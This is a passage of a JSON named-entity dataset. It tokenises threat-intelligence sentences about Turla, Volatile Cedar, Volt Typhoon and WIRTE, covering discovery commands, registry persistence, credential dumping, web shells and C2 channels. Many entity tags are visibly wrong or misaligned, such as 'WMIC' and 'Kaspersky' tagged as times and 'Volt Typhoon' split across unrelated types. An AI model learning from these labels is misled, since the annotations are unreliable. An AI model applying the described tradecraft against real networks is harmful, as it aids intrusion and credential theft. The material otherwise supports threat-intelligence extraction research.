"O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "PowerShell", - "profiles", - "to", - "maintain", - "persistence", - "on", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "running", - "processes", - "using", - "the", - "<code>tasklist", - "/v</code>", - "command.", - "Turla", - "RPC", - "backdoors", - "have", - "also", - "enumerated", - "processes", - "associated", - "with", - "specific", - "open", - "ports", - "or", - "named", - "pipes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "also", - "used", - "PowerSploit's", - "<code>Invoke-ReflectivePEInjection.ps1</code>", - "to", - "reflectively", - "load", - "a", - "PowerShell", - "payload", - "into", - "a", - "random", - "process", - "on", - "the", - "victim", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "RPC", - "backdoors", - "have", - "included", - "local", - "UPnP", - "RPC", - "proxies." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "IronPython", - "scripts", - "as", - "part", - "of", - "the", - "IronNetInjector", - "toolchain", - "to", - "drop", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "information", - "in", - "the", - "Windows", - "Registry", - "with", - "the", - "<code>reg", - "query</code>", - "command.", - "Turla", - "has", - "also", - "retrieved", - "PowerShell", - "payloads", - "hidden", - "in", - "Registry", - "keys", - "as", - "well", - "as", - "checking", - "keys", - "associated", - "with", - "null", - "session", - "named", - "pipes", - "." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Turla", - "Javascript", - "backdoor", - "added", - "a", - "local_update_check", - "value", - "under", - "the", - "Registry", - "key", - "<code>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "to", - "establish", - "persistence.", - "Additionally,", - "a", - "Turla", - "custom", - "executable", - "containing", - "Metasploit", - "shellcode", - "is", - "saved", - "to", - "the", - "Startup", - "folder", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "remote", - "systems", - "on", - "a", - "local", - "network", - "using", - "the", - "<code>net", - "view</code>", - "and", - "<code>net", - "view", - "/DOMAIN</code>", - "commands.", - "Turla", - "has", - "also", - "used", - "<code>net", - "group", - "\"Domain", - "Computers\"", - "/domain</code>,", - "<code>net", - "group", - "\"Domain", - "Controllers\"", - "/domain</code>,", - "and", - "<code>net", - "group", - "\"Exchange", - "Servers\"", - "/domain</code>", - "to", - "enumerate", - "domain", - "computers,", - "including", - "the", - "organization's", - "DC", - "and", - "Exchange", - "Server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "used", - "<code>net", - "use</code>", - "commands", - "to", - "connect", - "to", - "lateral", - "systems", - "within", - "a", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "obtained", - "information", - "on", - "security", - "software,", - "including", - "security", - "logging", - "information", - "that", - "may", - "indicate", - "whether", - "their", - "malware", - "has", - "been", - "detected." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "compromised", - "servers", - "as", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "attempted", - "to", - "trick", - "targets", - "into", - "clicking", - "on", - "a", - "link", - "featuring", - "a", - "seemingly", - "legitimate", - "domain", - "from", - "Adobe.com", - "to", - "download", - "their", - "malware", - "and", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "operating", - "system", - "configuration", - "details", - "using", - "the", - "<code>systeminfo</code>", - "and", - "<code>set</code>", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "network", - "configuration", - "details", - "using", - "the", - "<code>arp", - "-a</code>,", - "<code>nbtstat", - "-n</code>,", - "<code>net", - "config</code>,", - "<code>ipconfig", - "/all</code>,", - "and", - "<code>route</code>", - "commands,", - "as", - "well", - "as", - "NBTscan.", - "Turla", - "RPC", - "backdoors", - "have", - "also", - "retrieved", - "registered", - "RPC", - "interface", - "information", - "from", - "process", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "active", - "local", - "network", - "connections", - "using", - "the", - "<code>netstat", - "-an</code>,", - "<code>net", - "use</code>,", - "<code>net", - "file</code>,", - "and", - "<code>net", - "session</code>", - "commands.", - "Turla", - "RPC", - "backdoors", - "have", - "also", - "enumerated", - "the", - "IPv4", - "TCP", - "connection", - "table", - "via", - "the", - "<code>GetTcpTable2</code>", - "API", - "call." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "running", - "services", - "and", - "associated", - "processes", - "using", - "the", - "<code>tasklist", - "/svc</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "the", - "system", - "time", - "by", - "using", - "the", - "<code>net", - "time</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "obtained", - "and", - "customized", - "publicly-available", - "tools", - "like", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "the", - "VPS", - "infrastructure", - "of", - "compromised", - "Iranian", - "threat", - "actors." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Area", - "I-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "VBS", - "scripts", - "throughout", - "its", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "HTTP", - "and", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "legitimate", - "web", - "services", - "including", - "Pastebin,", - "Dropbox,", - "and", - "GitHub", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "created", - "web", - "accounts", - "including", - "Dropbox", - "and", - "GitHub", - "for", - "C2", - "and", - "document", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "frequently", - "used", - "compromised", - "WordPress", - "sites", - "for", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "RPC", - "backdoors", - "have", - "used", - "cmd.exe", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "gathered", - "credentials", - "from", - "the", - "Windows", - "Credential", - "Manager", - "tool." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "WMI", - "event", - "filters", - "and", - "consumers", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "established", - "persistence", - "by", - "adding", - "a", - "Shell", - "value", - "under", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volatile", - "Cedar", - "has", - "targeted", - "publicly", - "facing", - "web", - "servers,", - "with", - "both", - "automatic", - "and", - "manual", - "vulnerability", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volatile", - "Cedar", - "can", - "deploy", - "additional", - "tools." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volatile", - "Cedar", - "has", - "performed", - "vulnerability", - "scans", - "of", - "the", - "target", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volatile", - "Cedar", - "can", - "inject", - "web", - "shell", - "code", - "into", - "a", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volatile", - "Cedar", - "has", - "used", - "DirBuster", - "and", - "GoBuster", - "to", - "brute", - "force", - "web", - "directories", - "and", - "DNS", - "subdomains." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "archived", - "the", - "ntds.dit", - "database", - "as", - "a", - "multi-volume", - "password-protected", - "archive", - "with", - "7-Zip." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "have", - "inspected", - "server", - "logs", - "to", - "remove", - "their", - "IPs." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "attempted", - "to", - "obtain", - "credentials", - "from", - "OpenSSH,", - "realvnc,", - "and", - "PuTTY." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "staged", - "collected", - "data", - "in", - "password-protected", - "archives." - ], - "ner_tags": [ - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "stolen", - "the", - "Active", - "Directory", - "database", - "from", - "targeted", - "environments", - "and", - "used", - "Wevtutil", - "to", - "extract", - "event", - "log", - "information." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "run", - "`net", - "group", - "/dom`", - "and", - "`net", - "group", - "\"Domain", - "Admins\"", - "/dom`", - "in", - "compromised", - "environments", - "for", - "account", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "compromised", - "domain", - "accounts", - "to", - "authenticate", - "to", - "devices", - "on", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "run", - "`net", - "group`", - "in", - "compromised", - "environments", - "to", - "discover", - "domain", - "groups." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "gained", - "initial", - "access", - "through", - "exploitation", - "of", - "CVE-2021-40539", - "in", - "internet-facing", - "ManageEngine", - "ADSelfService", - "Plus", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "run", - "`rd", - "/S`", - "to", - "delete", - "their", - "working", - "directories", - "and", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "the", - "built-in", - "netsh", - "`port", - "proxy`", - "command", - "to", - "create", - "proxies", - "on", - "compromised", - "systems", - "to", - "facilitate", - "access." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "attempted", - "to", - "access", - "hashed", - "credentials", - "from", - "the", - "LSASS", - "process", - "memory", - "space." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "copied", - "web", - "shells", - "between", - "servers", - "in", - "targeted", - "environments." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "saved", - "stolen", - "files", - "including", - "the", - "ntds.dit", - "database", - "and", - "the", - "`SYSTEM`", - "and", - "`SECURITY`", - "Registry", - "hives", - "locally", - "to", - "the", - "`C:\\Windows\\Temp\\`", - "directory." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "run", - "`net", - "localgroup", - "administrators`", - "in", - "compromised", - "environments", - "to", - "enumerate", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "`wevtutil.exe`", - "and", - "the", - "PowerShell", - "command", - "`Get-EventLog", - "security`", - "to", - "enumerate", - "Windows", - "logs", - "to", - "search", - "for", - "successful", - "logons." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "appended", - "copies", - "of", - "the", - "ntds.dit", - "database", - "with", - "a", - ".gif", - "file", - "extension." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "legitimate", - "looking", - "filenames", - "for", - "compressed", - "copies", - "of", - "the", - "ntds.dit", - "database", - "and", - "used", - "names", - "including", - "cisco_up.exe,", - "cl64.exe,", - "vm3dservice.exe,", - "watchdogd.exe,", - "Win.exe,", - "WmiPreSV.exe,", - "and", - "WmiPrvSE.exe", - "for", - "the", - "Earthworm", - "and", - "Fast", - "Reverse", - "Proxy", - "tools." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "ntds.util", - "to", - "create", - "domain", - "controller", - "installation", - "media", - "containing", - "usernames", - "and", - "password", - "hashes." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "compromised", - "small", - "office", - "and", - "home", - "office", - "(SOHO)", - "network", - "edge", - "devices,", - "many", - "of", - "which", - "were", - "located", - "in", - "the", - "same", - "geographic", - "area", - "as", - "the", - "victim,", - "to", - "proxy", - "network", - "traffic." - ], - "ner_tags": [ - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "PowerShell", - "including", - "for", - "remote", - "system", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "enumerated", - "running", - "processes", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "compromised", - "devices", - "and", - "customized", - "versions", - "of", - "open", - "source", - "tools", - "such", - "as", - "Fast", - "Reverse", - "Proxy", - "(FRP),", - "Earthworm,", - "and", - "Impacket", - "to", - "proxy", - "network", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "B-Purp", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "queried", - "the", - "Registry", - "on", - "compromised", - "systems,", - "`reg", - "query", - "hklm\\software\\`,", - "for", - "information", - "on", - "installed", - "software." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "multiple", - "methods,", - "including", - "Ping,", - "to", - "enumerate", - "systems", - "on", - "compromised", - "networks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "compromised", - "PRTG", - "servers", - "from", - "other", - "organizations", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "queried", - "the", - "Registry", - "on", - "compromised", - "systems", - "for", - "information", - "on", - "installed", - "software." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "a", - "version", - "of", - "the", - "Awen", - "web", - "shell", - "that", - "employed", - "AES", - "encryption", - "and", - "decryption", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "run", - "system", - "checks", - "to", - "determine", - "if", - "they", - "were", - "operating", - "in", - "a", - "virtualized", - "environment." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "discovered", - "file", - "system", - "types,", - "drive", - "names,", - "size,", - "and", - "free", - "space", - "on", - "compromised", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "executed", - "multiple", - "commands", - "to", - "enumerate", - "network", - "topology", - "and", - "settings", - "including", - "`ipconfig`,", - "`netsh", - "interface", - "firewall", - "show", - "all`,", - "and", - "`netsh", - "interface", - "portproxy", - "show", - "all`." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "`netstat", - "-ano`", - "on", - "compromised", - "hosts", - "to", - "enumerate", - "network", - "connections." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "executed", - "the", - "PowerShell", - "command", - "`Get-EventLog", - "security", - "-instanceid", - "4624`", - "to", - "identify", - "associated", - "user", - "and", - "computer", - "account", - "names." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "customized", - "versions", - "of", - "open-source", - "tools", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "webshells,", - "including", - "ones", - "named", - "AuditReport.jspx", - "and", - "iisstart.aspx,", - "in", - "compromised", - "environments." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "used", - "the", - "Windows", - "command", - "line", - "to", - "perform", - "hands-on-keyboard", - "activities", - "in", - "targeted", - "environments", - "including", - "for", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Volt", - "Typhoon", - "has", - "leveraged", - "WMIC", - "including", - "for", - "execution", - "and", - "remote", - "system", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "used", - "Base64", - "to", - "decode", - "malicious", - "VBS", - "script." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "downloaded", - "PowerShell", - "code", - "from", - "the", - "C2", - "server", - "to", - "be", - "executed." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "attempted", - "to", - "lure", - "users", - "into", - "opening", - "malicious", - "MS", - "Word", - "and", - "Excel", - "files", - "to", - "execute", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Tool", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "named", - "a", - "first", - "stage", - "dropper", - "`Kaspersky", - "Update", - "Agent`", - "in", - "order", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "used", - "HTTPS", - "over", - "ports", - "2083", - "and", - "2087", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIRTE", 